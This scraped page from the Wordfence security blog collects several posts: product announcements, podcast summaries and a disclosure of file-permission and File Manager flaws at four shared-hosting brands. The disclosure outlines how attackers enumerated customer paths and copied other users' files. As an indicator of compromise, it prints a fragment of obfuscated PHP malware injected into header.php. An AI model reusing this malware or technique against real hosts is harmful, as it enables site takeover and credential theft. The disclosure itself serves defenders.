Major Central Release: Alerts, Security Events and Slack Integration

In February we launched Wordfence Central, an efficient way to manage the security of many WordPress sites in one place. If you have multiple sites and haven’t checked it out yet, you should. It includes a powerful dashboard, a single interface to view and manage security findings across all of your sites and robust new tools that make managing Wordfence configuration for your websites a breeze.

Wordfence Central has been incredibly popular. Tens of thousands of sites have been added so far and more are added every day.

Today we are announcing the first major feature release for Central since its launch in February. This represents a big step forward not only for Central, but for Wordfence as a whole. The first major improvement is the addition of a brand new Central alerts feature. You can now configure Central to take over security alerting for your sites, and leverage severity level configuration and a new daily digest feature. Alerts can be sent via any combination of Email, SMS and Slack. We’ve also added a new Security Events tab to Central along with the ability to alert you when the higher priority events occur.

Improving the Signal to Noise Ratio

Alerts sent from Wordfence in the default configuration do a great job of letting you know when you have issues and reminding you important updates are needed. But if you manage a lot of sites, the volume of alerts sent can be overwhelming. We hear from customers about this frequently. The new Central alerts feature gives you everything you need to solve that problem by alerting you to things that need immediate attention and letting you deal with the lower priority information when your schedule allows.

New Severity Classification

Alerts are now categorized by severity: Critical, High, Medium and Low. You are able to choose how you want to be notified about events based on what severity level they have been assigned. You can even choose to turn off alert notifications altogether.

SMS Alerts and Slack Integration

When an important security event occurs you want to know about it right away. Emails can get lost in your inbox, even when they’re important. With that in mind we added SMS as a delivery option. For most, text messages do a great job of getting your attention when it really matters.

We’ve spoken to many organizations who, like us, use Slack for team collaboration. Wordfence Central can now send highly detailed information to Slack for your team to act upon.

Here’s an example of a Security Event alert delivered via Slack:

Daily Digest

We’ve also added an optional daily digest, which provides a high level summary of the activity for all of the sites connected to your Central account for the previous day. This is a great way to stay on top of lower priority events and findings without receiving individual alerts for all of them.

Here’s an example of a Daily Digest message delivered via Slack:

We expect a common approach will be to enable the daily digest and disable alerts for low and potentially medium severity findings and events.

Security Events

We’ve enabled a number of new security events that are now viewable via a new “Events” tab in Central. They are:

  • When Wordfence is automatically updated, you’ll get a notification when an update occurs. *
  • If Wordfence is deactivated. *
  • When the Wordfence firewall is deactivated.
  • When an IP address is blocked
  • When someone is locked out from login
  • When someone with administrator access signs in. *
  • When that administrator signs in from a new device or location. *
  • When a non-admin signs in.
  • When a non-admin signs in from a new device or location.
  • When someone is blocked from logging in for using a password found in a breach. *
  • When there’s a large increase in attacks on my site. *
  • When a Wordfence scan stops without completing.

You can also configure alerts to be sent via email, SMS or Slack for events followed by a * in the list above.

Here is what the new events tab looks like:

Getting Started

All of these new features are currently available on Wordfence Central. In Central you will see a new gear icon in the upper right corner that will take you where you can configure Central alerts. Once you’ve enabled alerts from Central make sure to disable them for your individual sites. Simply select “No” for the “Send alerts from individual sites?” option.

You will need to upgrade to Wordfence 7.3.4 (or greater) for security alerts to begin flowing into the new events tab. There are no configuration changes necessary for events to start flowing to Central once you’ve upgraded to 7.3.4.

We’re very excited about these new features and would love to hear any feedback you have in the comments. As always our team is available to help out with support questions on the WordPress.org forums for free users and here on our website for Premium customers.

The post Major Central Release: Alerts, Security Events and Slack Integration appeared first on Wordfence.

Read More

Podcast Episode 22: Ninja Forms Developer James Laws on Building & Expanding a WordPress Business

Ninja Forms is used on over 1 million WordPress sites. In this episode, Mark interviews James Laws, the co-founder of WP Ninjas, the developers behind this robust and powerful form builder. James and Mark talk about revenue models that work, how to find new opportunities through market research, experimentation with new products and services as well as learning from your customers. They also discuss how to choose your next project when you have too many ideas, and the new businesses James and WP Ninjas are exploring in eCommerce. It’s a fascinating discussion that will help you think about your own businesses and career in new ways. Enjoy!

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find James on Twitter @jameslaws or at JamesLaws.com. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The post Podcast Episode 22: Ninja Forms Developer James Laws on Building & Expanding a WordPress Business appeared first on Wordfence.

Read More

Podcast Episode 21: New Plugin Vulns Exploited in the Wild, an Extortion Scam and the CBP Data Breach

This week, we discuss active exploitation of a plugin vulnerability in the wild, an extortion scam hitting numerous website owners, exposure of Industrial Control Systems to attackers as well as a CBP breach affecting travelers in the United States. We also talk about an email server vulnerability and what to do in a SIM port attack.

Here are approximate timestamps in case you want to jump around:
0:35 User Submitted Posts Plugin Vulnerability Seeing Attacks
4:20 An extortion scam is threatening website owners & how to protect your site
10:10 CBP breach of license plates and facial recognition data affecting US travelers
16:54 WordPress accessibility proposal
25:25 Google Cloud outage affects numerous services
26:59 State of Industrial Control Systems in Poland and Switzerland
36:00 Severe RCE in Exim mail transfer agent
37:09 What to do when SIM swapping happens to you

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant. Please feel free to post your feedback in the comments below.

The post Podcast Episode 21: New Plugin Vulns Exploited in the Wild, an Extortion Scam and the CBP Data Breach appeared first on Wordfence.

Read More

Podcast Episode 20: Making Big Changes by Adopting Micro-Habits with Nathan Ingram

At WordCamp Orange County, Nathan Ingram participated in a unique business track discussion about failure, something with which most entrepreneurs are intimately familiar. Immediately after his talk, Nathan sat down with Mark for this interview. The conversation goes deep fast, as both Mark and Nathan share their thoughts about being an entrepreneur and how “the best lessons in life are learned from failure.” Nathan recently lost 50 pounds in two months and he talks about the micro-habits that he leveraged to make big successful changes with his health. This unique, honest and heartfelt interview has a number of lessons for those of us looking to optimize our business processes and find better balance in life.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Nathan on Twitter @nathaningram or at NathanIngram.com where you can also learn more about Nathan’s incredible health journey. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The post Podcast Episode 20: Making Big Changes by Adopting Micro-Habits with Nathan Ingram appeared first on Wordfence.

Read More

Podcast Episode 19: Service Vulnerabilities in Four Hosting Companies

In episode 19 we talk to Brad Haas about recently patched service vulnerabilities that impacted four popular hosting companies. We also talk about a new login security plugin for WordPress that we’ve launched. In the news we cover a wave of SIM swapping attacks hitting cryptocurrency users, NGINX vulnerabilities and recent data breaches affecting the personal information of millions of people.

Here are approximate timestamps in case you want to jump around:
0:40 Interview with Brad Haas on service vulnerability impacting four popular hosting companies
15:31 New Wordfence Login Security plugin
27:54 SIM port attacks hit cryptocurrency users
35:23 100,000 Australian’s private details exposed by Westpac PayID
39:44 Billing details for 11.9 million Quest Diagnostics customers exposed
43:47 NGINX RCE Vulnerabilities

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Brad at @realbradhaas. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 19: Service Vulnerabilities in Four Hosting Companies appeared first on Wordfence.

Read More

Podcast Episode 19: Service Vulnerabilities in Four Hosting Companies

In episode 19 we talk to Brad Haas about recently patched service vulnerabilities that impacted four popular hosting companies. We also talk about a new login security plugin for WordPress that we’ve launched. In the news we cover a wave of SIM swapping attacks hitting cryptocurrency users, NGINX vulnerabilities and recent data breaches affecting the personal information of millions of people.

Here are approximate timestamps in case you want to jump around:
0:40 Interview with Brad Haas on service vulnerability impacting four popular hosting companies
15:31 New Wordfence Login Security plugin
27:54 SIM port attacks hit cryptocurrency users
35:23 100,000 Australian’s private details exposed by Westpac PayID
39:44 Billing details for 11.9 million Quest Diagnostics customers exposed
43:47 NGINX RCE Vulnerabilities

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Brad at @realbradhaas. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 19: Service Vulnerabilities in Four Hosting Companies appeared first on Wordfence.

Read More

Service Vulnerability: Four Popular Hosting Companies Fix NFS Permissions and Information Disclosure Problems

Last year, we published two disclosures of service vulnerabilities on hosting platforms. The first one included a trio of brands: Hostway, Momentous, and Paragon Group. The second was for MelbourneIT. In all cases, we were happy to report that the affected companies took our disclosures seriously and moved quickly to fix the problems.

Today we’re announcing a similar disclosure for several brands owned by Endurance International Group, including iPage, FatCow, PowWeb, and NetFirms. A pair of vulnerabilities on these platforms allowed attackers to tamper with customers’ databases directly, without actually accessing their websites. Following our Vulnerability Disclosure Policy, we privately disclosed these problems to the Endurance team. Their response was immediate and exemplary: they communicated with us in order to understand the problems, activated their incident response team to conduct triage, implemented hotfixes within days, and implemented full fixes soon after. Their actions showed solid commitment to their customers’ security.

Attacks and Investigation

Our Security Services Team noticed a recent trend in customers whose sites were hosted on the affected platforms. An administrator account suddenly appeared in the sites, and attackers logged into that account and added malware to the sites using the WordPress theme editor. The account had the same unusual username (“badminton”) in each case. The malware was obfuscated, but performed the same function on each affected site, hijacking site traffic from search engines and redirecting visitors to spam sites.

The platforms do make site access logs available to site owners, but the logs didn’t show any unusual activity on the days of the attacks. We found no malware other than what the attackers added in the theme files, no vulnerable themes or plugins, and generally nothing in common across all the affected sites except that they were on the same set of hosting services.

As in the service vulnerabilities we published last year, it appeared that the attackers had a way to steal database credentials for our customers’ sites, and then interact with the database directly in order to create their rogue administrator accounts. We started to investigate whether that would be possible on the platforms in question, and eventually we discovered two vulnerabilities which allowed it to happen.

The balance of this article is most appropriate for a technical audience. If you are a less technical reader you may want to skip down to the “What You Need To Do” section below.

File and Directory Information Exposure Vulnerability

After compromising a site, it is common for attackers to explore filesystems on the server in order to search for other vulnerabilities. On the affected servers, we discovered that the /opt/users directory contained subdirectories revealing the names of the user accounts for every website on the platform.

For example, a website “example.com” on FatCow might run under the username moo.examplecom . There would be a corresponding directory for it at /opt/users/moo/e/x/moo.examplecom . Permissions on the /opt directory were lax enough that all the subdirectories could be listed by any user. So with a bit of scripting, it was possible to harvest the usernames for every website using FatCow shared hosting (and likewise the other affected brands). After our disclosure, permissions were fixed on /opt/users so that the contents can no longer be listed.

Insufficient Permissions Vulnerability

Four conditions existed that contributed to this vulnerability:

  1. Customer files are all stored on a shared file system.
  2. The full path to a user’s web root directory was public or could be guessed.
  3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).
  4. An attacker could cause a program running in the group www to read files in arbitrary locations.

On the affected hosting platforms, all users’ files reside under a shared file system mounted at the directory /hermes . This satisfies the first condition of the Insufficient Permissions vulnerability.

The names of subdirectories in the full path to a site root directory follow a pattern. The full path for our fictional site example.com might be: /hermes/walnaweb15a/b1234/moo.examplecom/ .

Ownership and permissions on the file system follow a specific structure for each of the directories in the full path:

/hermes – root:root 0755 – since it is world-readable, its contents can be listed

/hermes/walnaweb15a – root:root 0711 – contents cannot be listed except by root, but can be guessed

/hermes/walnaweb15a/b1234 – root:root 0711 –  contents cannot be listed except by root, but can be guessed

/hermes/walnaweb15a/b1234/moo.examplecom – moo.examplecom:www 0750 – contents can be listed by the owner or by any user belonging to the group “www”

The contents of directories like /hermes/walnaweb15a appear to follow a simple pattern – the letter “b” followed by one or more digits. Attackers would have noticed this by viewing the working directory of compromised sites, or even by searching Google for “/hermes/walnaweb” or similar directory names to view accidental full path disclosures. A script can easily find every subdirectory by checking for the existence of /hermes/walnaweb15a/b1, /hermes/walnaweb15a/b2, etc.

It is trickier but still possible to find the contents of the b* directories – this is where the File and Directory Information Exposure vulnerability would be used. Attackers could use scripting to iterate over each username and check for its existence in each b* directory. It’s inefficient, but the attacker could gradually build a large list of full paths to site root directories, satisfying the second condition of the Insufficient Permissions vulnerability.

As outlined above, the default permissions on directories and files on the affected platforms ensure that a program running in the group www can traverse into any user’s directory and read files in it, satisfying the third condition.

PHP scripts in any given user’s site run as that user and as the group cgiuser. As such, they don’t have permission to access other users’ files. However, the File Manager in the hosting control panel runs in the group www . Its operations seem to be restricted to a user’s own site root directory, but it can be manipulated to copy files from any location in the entire file system. So if an attacker crafts requests that point it to other users’ sensitive files, it will have sufficient privileges to copy those files into a directory under the attacker’s control.

After our disclosure, the flaws in the File Manager were patched, the platform administrators made architectural adjustments to address the permissions problems at a deeper level.

Remediation

Before the vulnerabilities were fixed, the only workaround for site owners was to set permissions on any sensitive file to 0600. This was not ideal, as there are a number of ways the permissions could be reset as a side effect of scripts running on the website or server. Thankfully, the Endurance team worked very quickly to fix the problems. Our disclosure was on May 7. They replied after hours acknowledging the report, and worked with us during the following two weeks. Their hotfixes were in place by May 10, and permanent fixes finished by May 15.

What You Need To Do

If you use shared hosting on any of the brands we mentioned, use Wordfence to check your site for issues. If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:

<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["dd\x70\x68z\x67\x64gx"]="sl\x77k\x77i";${"\x47\x4cO\x42\x41L\x53"}["c\x7a\x66\x6dubkdo\x6a\x78"]="\x6c\x6f\x63\x61t\x69\x6fn";${"\x47\x4c\x4fB\x41LS"}["\x67\x64\x64e\x74\x62p\x75f\x65i"]="\x68t\x6d\x6c";${"\x47\x4cOB\x41\x4cS"}["\x77i\x64\x68\x6bv\x6da"]="\x73t\x72\x66";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66s\x75\x71\x79\x6evw"]="b\x6f\x74";${"\x47\x4cOBAL\x53"}["w\x6c\x79\x63\x61\x76\x62\x71\x68\x6f\x6c\x75"]="cac\x68\x65";${"G\x4cO\x42\x41L\x53"}["ry\x68\x72ku\x6b"]="\x73\x63h\x65\x6d\x65";${"\x47\x4c\x4f\x42\x41L\x53"}["\x74\x6a\x6bc\x64e\x65\x69w"]="\x73l\x77k\x77i\x32";${"G\x4cOBA\x4cS"}["\x79\x65\x64\x73\x67\x6ah\x69\x73\x67"]="\x73\x6c\x74l\x65\x69l\x73";

You should also check your list of user accounts and look for any rogue administrators. If your site has any of these issues, we recommend using our site cleaning service to fix them.

Conclusion

With the popularity of WordPress today, the security of the WordPress community at large is critically important. We are pleased to see that our  approach to handling service vulnerabilities is working to support that need, and bringing about an improved overall security posture for the community.

Our Security Services Team continues to analyze hundreds of hacked websites each month, so we expect to find more of these in the future. We will continue to provide updates here on the blog.

Finally, a huge thank you to Matt Barry and Sean Murphy from our team for helping with the vulnerability research.

The post Service Vulnerability: Four Popular Hosting Companies Fix NFS Permissions and Information Disclosure Problems appeared first on Wordfence.

Read More

Introducing the Wordfence Login Security Plugin

Today we are excited to announce the release of a brand new plugin: Wordfence Login Security. This plugin is a completely standalone plugin and you don’t need to install the full version of Wordfence to take advantage of the specific security features included in it.

Wordfence Login Security is designed by our team to secure your login and authentication system. It’s worth noting that this plugin does not include the firewall, malware scanner and other features that the full Wordfence plugin comes with.

If you already have an alternative firewall solution in place and are covered for malware scanning, then this plugin is perfect for you because it secures your login system against several dangerous and targeted attacks.

Wordfence Login Security includes the following features:

  • It provides robust two-factor authentication that is not vulnerable to cellphone SIM porting attacks.
  • It includes a login page CAPTCHA that protects you from sophisticated credential stuffing attacks that use a wide range of IP addresses.
  • It also includes XML-RPC protection.

These features are also included in the full Wordfence plugin. So if you are using Wordfence already, you don’t need to install this new plugin. You can learn more about how these features are available in Wordfence by checking out last week’s announcement post.

Why did we do this?

Over the last year we have spent a lot of time talking to WordPress users. One thing we learned, from larger companies especially, is that everyone’s situation is different. And that even means (gasp!) that some people can’t or don’t run Wordfence on some of their sites. The reasons vary, but in most cases there are many features they could benefit from using.

With that in mind, when we decided to completely rewrite our two-factor authentication feature we decided to also release it as a separate plugin. Our hope is that by making sets of related features available in “modular” plugins like this, that more websites will benefit from Wordfence protection. Our goal, after all, is to make the web safer. The more sites we can keep safe the better.

Do I need both plugins?

In a word, no. Wordfence Login Security and the full Wordfence plugin share the same code for these features. If you already have the full Wordfence plugin installed you already have all of the features available in Wordfence Login Security. If you try to install Wordfence Login Security, nothing will change.

Can I install the full Wordfence plugin if I have Wordfence Login Security installed?

Wordfence Login Security and Wordfence are built to play nicely together. They integrate seamlessly. If you are using Wordfence Login Security and then install the full version of Wordfence, all of your settings are preserved.

Once you install the full version of Wordfence, a new ‘Wordfence’ section will be added to your menu. The settings for Wordfence Login Security will appear in this area as one of the security features available to you.

Again, all your settings are preserved and you can continue knowing your site has the additional features that Wordfence includes like our firewall and malware scanner.

Do I need to upgrade to Premium to use Wordfence Login Security?

This plugin is free and you do not need to pay to use it. In addition, the features that are included in Wordfence Login Security are also available in the free version of the full Wordfence plugin.

The Wordfence team is committed to making the Web a safer place. We wanted to make these essential security features available to absolutely every WordPress site owner and user at no cost. We also built the plugin to be as widely compatible as possible so that there is no barrier to entry when it comes to securing your website against credential stuffing attacks and other attacks targeting your login system.

What’s next for Wordfence Login Security?

Our team spent the past year developing and testing Wordfence Login Security. Our team has taken the plugin through a rigorous QA process that ensures it is widely compatible, rock solid and ready for production. We have also performed a comprehensive security audit on it to ensure that there are no loopholes or issues that an attacker can exploit.

At this point, Wordfence Login Security is an extremely stable and robust security solution for your WordPress authentication system. Our intention is to set the standard for WordPress two-factor authentication with this product.

Our next steps are to listen to the community feedback while providing excellent support for our customers. This will help guide the product direction and our development team.

If you are not currently using the full version of Wordfence, we hope you will at the very least install Wordfence Login Security to protect your WordPress authentication system. Our team is installing this plugin on their own sites – in fact many have been running the beta version for months.

Wordfence Login Security is a huge step forward in helping secure WordPress and we hope you will help spread the word in the community that this plugin is available, completely free, and does an excellent job of improving the security posture of a WordPress website.

Regards,

Mark Maunder
Wordfence/Defiant Founder and CEO

The post Introducing the Wordfence Login Security Plugin appeared first on Wordfence.

Read More

Episode 18: Scaling a WordPress Agency with Entrepreneur Verious Smith

At WordCamp Orange County, Mark interviewed Verious Smith from Philoveracity Design, a digital agency in southern California. Verious has also been the lead organizer of WordCamp Riverside and runs WordPress meetups to give back to the community. Mark and Verious talk about the challenges of entrepreneurship, growing from freelancer to an agency, and trust and interdependence in remote work. Verious is always striving to learn new things to optimize performance and improve workflow. We hope you enjoy the interview and get as much inspiration from Verious as we did.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Verious on Twitter @verioussmith or at Philoveracity Design.

The post Episode 18: Scaling a WordPress Agency with Entrepreneur Verious Smith appeared first on Wordfence.

Read More

Podcast Episode 17: 3 Severe WordPress Plugin Vulnerabilities

Mikey Veenstra joins us to talk about three WordPress plugins with severe vulnerabilities affecting well over 150,000 WordPress installations. Two plugins have been patched, one has not. With Mark under deadline for a film project, Mikey also talks some security news with Kathy. We cover a Docker vulnerability, anatomy of a SIM port attack, zero-day Windows exploits released by a disgruntled security researcher, two large scale data leaks affecting millions of people, and revisit the Baltimore ransomware problem and how the NSA’s Eternal Blue tool was used in the attack.

Here are approximate timestamps in case you want to jump around:
1:00 Interview with Mikey Veenstra on 3 severe WordPress plugin vulnerabilities
13:00 The news, and where’s Mark?
13:30 Docker vulnerability not yet patched
16:24 Anatomy of a SIM port attack
20:17 Microsoft zero-day exploits on Github
25:34 XSS vulnerability discovered in Slimstat plugin
26:26 Over 49 million Instagram users data exposed
29:28 First American Financial leaked hundreds of millions title insurance records
34:20 How an NSA malware tool was used in the Baltimore ransomware attack

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Mikey at @heyitsmikeyv. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 17: 3 Severe WordPress Plugin Vulnerabilities appeared first on Wordfence.

Read More
Page 1 of 1,01612345»102030...Last »